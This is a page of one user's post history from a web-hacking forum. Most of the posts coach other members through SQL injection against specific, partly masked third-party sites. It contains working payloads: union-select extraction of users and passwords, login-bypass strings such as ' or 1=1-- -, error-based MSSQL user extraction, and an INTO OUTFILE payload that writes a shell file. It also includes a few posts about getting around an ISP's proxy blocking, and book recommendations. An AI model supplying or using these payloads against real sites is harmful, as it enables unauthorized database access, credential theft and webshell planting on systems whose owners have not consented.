Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 36
2 years ago
InjEctOr
Albino Wrote: ------------------------------------------------------- > You might be able bypass it by creating an SSH > tunnel to your proxy. You're right, but I forgot to say that I need to get benefit of my squid server for caching, accelerating and so on. So I need to keep using HTTP proxy.
Forum: Networking
2 years ago
InjEctOr
Hi there, Recently My ISP provider blocked any kind of http proxies can be used in browsers. When I put my proxy settings in my browser, it keeps loading with no response. I've squid proxy running on my own server and worked fine before that modification. I tried to do traceroute and found interesting thing "4th line" which may indicate that there is a device that receives and filter
Forum: Networking
5 years ago
InjEctOr
Pragmatk Wrote: ------------------------------------------------------- > InjEctOr, you're acting like a fucking idiot. I > hope you will realize that some day. rubbish!, say u don't have answer about that post
Forum: SQL and Code Injection
5 years ago
InjEctOr
10x lightos 4 link:) i think i garret! http://vuln_site/displaysection.php?czacc=&zSelectedSectionID=' and 1=0 union select @@version,2,3,4,5-- - // look at the title
Forum: SQL and Code Injection
5 years ago
InjEctOr
Pragmatk Wrote: ------------------------------------------------------- > You have both an LFI and a SQL injection. My guess > is that the SQL query is used to determine whether > there's a cached version already. If there is, it > will include that. DUH! where's the LFI stuff in our story!?
Forum: SQL and Code Injection
5 years ago
InjEctOr
blackcode Wrote: ------------------------------------------------------- > thanks injector, > > however, i believe in case of blindsqli > and 1=1-- > and 1=2-- > > should display a difference to identify true or > false (correct me if im wrong?) ?? not all the cases -- sign work as it should, try another sign like /* or # anyway i can't give ya completely
Forum: SQL and Code Injection
5 years ago
InjEctOr
yes u are right koz of quotation before your injection look at your injection hel'+'lo and the result, that's mean this injection becoming inside like is: 'helo'+'lo', so we r surrounded with quotations :) so what we need is something like this : ' or 1=1-- - ' or 1=1# ' or 1=1/* try that
Forum: SQL and Code Injection
5 years ago
InjEctOr
yes!, this's the error the we need! :) "Problem adding a value into the calendar" appear due to char/string datatype that retrieved from (SELECT top 1 username FROM calendar) regarding the datatype of the icon column "int, maybe" so now, keep woking with "top 1" when u guess users table/columns
Forum: SQL and Code Injection
5 years ago
InjEctOr
koz u guest wrong table/column names, lets try this : INSERT INTO calendar (username, xdate, hour, type, text, title,icon) VALUES ( 'usernamehere', '2009-03-19', '0', 'Note', 'hey', 'Hey', (SELECT top 1 username FROM calendar) ) or instead of "top 1" use max() or min()
Forum: SQL and Code Injection
5 years ago
InjEctOr
@ranch9, welcome :) i wanna say something about this message "Unclosed quotation mark ...etc", whenever you see like that then notice that u haven't quotes before your injection. so here you can inject something like : or 1=1-- - or 1=(select * form users)-- - //if users is right then u will retrieve msg saying that something wrong with columns selected "koz of our * :)&
Forum: SQL and Code Injection
5 years ago
InjEctOr
you r facing blindfolded sqli you can deal with that using blind sqli tools like this http://www.hacker-soft.net/Soft/Soft_2205.htm good luck
Forum: SQL and Code Injection
5 years ago
InjEctOr
m4x Wrote: ------------------------------------------------------- > Nah Im still getting the insert error even with a > valid query: > ................ > > Even this does not work: > ................ > > That should def work ^ but doesnt. > > > HOWEVER, (SELECT 1) works. as I see "limit 1" doesn't work here, almost that's happeni
Forum: SQL and Code Injection
5 years ago
InjEctOr
@lightos, yes but.. there is another prob, it's "maxlenght" attribute in username input field. to solve that, delete maxlenght attribute and work with edited copy, use my copy if u want http://pastebin.com/f15a53073 :) now u can go on with having 1=1 to get username/password columns, this phase will help u to gather users records by using select as follows: union select min(),1,
Forum: SQL and Code Injection
5 years ago
InjEctOr
warra about: h ttp://******.edu/link_xml.asp?linkid=convert(int,(select user))-- or h ttp://******.edu/link_xml.asp?linkid=11393;convert(int,(select user))-- or h ttp://******.edu/link_xml.asp?linkid=11393 or 1=convert(int,(select user))--
Forum: SQL and Code Injection
5 years ago
InjEctOr
afternoon, when u put "'" the error : "') AND (`job_lng`.language_id = 1)" so I think our injection is coming before 1st closing bracket so try this injection: ) order by 1/* if not working change comment to this --, this -- - or this #
Forum: SQL and Code Injection
5 years ago
InjEctOr
nitation Wrote: ------------------------------------------------------- but the content of the >I also try ' and ''=' for the user/pass and no luck good, keep using that commit let's now try this: ' having 1=1 that's in the username field, then in password field put this '
Forum: SQL and Code Injection
5 years ago
InjEctOr
nitation Wrote: ------------------------------------------------------- > On the login form, I tried this for the username > and password > ' and 1=1-- > > This was the output > > Error in SQL2PHP Warning: odbc_exec(): SQL error: > Line 2: Incorrect syntax near '1'., SQL state > 37000 in SQLExecDirect in > D:\Webserver\******\www\logincomplete.php on line
Forum: SQL and Code Injection
5 years ago
InjEctOr
netpumber Wrote: ------------------------------------------------------- > ADODB.Field error '80020009' > > Either BOF or EOF is True, or the current record > has been deleted. Requested operation requires a > current record. sometimes this message can solves by change No. of record in table try this: union all select 1,2,username,3,4 from users where userd=2--
Forum: SQL and Code Injection
5 years ago
InjEctOr
1st, be sure that your injection is true by change something in . i.e. id=null union all select 1,2,usernam,3,4 from users-- //username changed if u got the same error then your injection isn't true maybe "users" table isn't from current schema so try to query about table_schema with table_name and then make your injection like this id=null union all select 1,2,username,3,
Forum: SQL and Code Injection
5 years ago
InjEctOr
sometimes not all commits work with, so just test all of it, e.i. ' order by 100000/* ' order by 100000-- ' order by 100000# so and so @Reiners, almost(if not always!) mysql_fetch_x that occurred by inject "'" mean its involved sqli $data=mysql_fetch_object(mysql_query("select * from sometable where id=15'")) of course fetch error here mean that mysql receive thi
Forum: SQL and Code Injection
5 years ago
InjEctOr
warra about limit , try this: ' or 1=1 limit 1,1-- changing 1st '1' well get next records
Forum: SQL and Code Injection
5 years ago
InjEctOr
look dude any sql statment which is from DDL Lang like : drop,alter,create... not possible in mysql even when u try 2 use it in "where , if" clause inj3ct0r
Forum: SQL and Code Injection
5 years ago
InjEctOr
link doesn't appear well
Forum: SQL and Code Injection
5 years ago
InjEctOr
1- don't trust on user's input 2- learn how to do that I advising u to have this book :http://www.microsoft.com/mspress/books/5957.aspx be safe, inj3ct0r
Forum: SQL and Code Injection
5 years ago
InjEctOr
U've 2 use 2nd column and 3rd one. i.e u wanna get db version try this : ') UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11 FROM beichten/* replace @@version with your column which u want to see . inj3ct0r
Forum: SQL and Code Injection
5 years ago
InjEctOr
i think if the magic quotes enabled u can't use into outfile/dumpfile koz we can't encrypt path after into outfile inj3ct0r
Forum: SQL and Code Injection
5 years ago
InjEctOr
to terminate query by semicolon ; and comment type -- (2 hyphen) i.e hxxp://www.site.com/pbtv_schedule/index.cfm?mode=details&day=05&month=08&year=2007&timezone=eastern&detail_id=343882 union select null;--'&channel=PBEN more info :http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/ inj3ct0r
Forum: SQL and Code Injection
6 years ago
InjEctOr
taking a look at here: http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
Forum: SQL and Code Injection
6 years ago
InjEctOr
the best boock talking about security code .. from microsoft get it from here : http://www.microsoft.com/mspress/books/5957.aspx it focus on microsoft's Products like c# , asp InjEctOr
Forum: SQL and Code Injection
6 years ago
InjEctOr
type same number of columns used in the first table by your link : union+select+1,2,3,'your code',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+INTO+OUTFILE '/tmp/shell.txt'/*
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2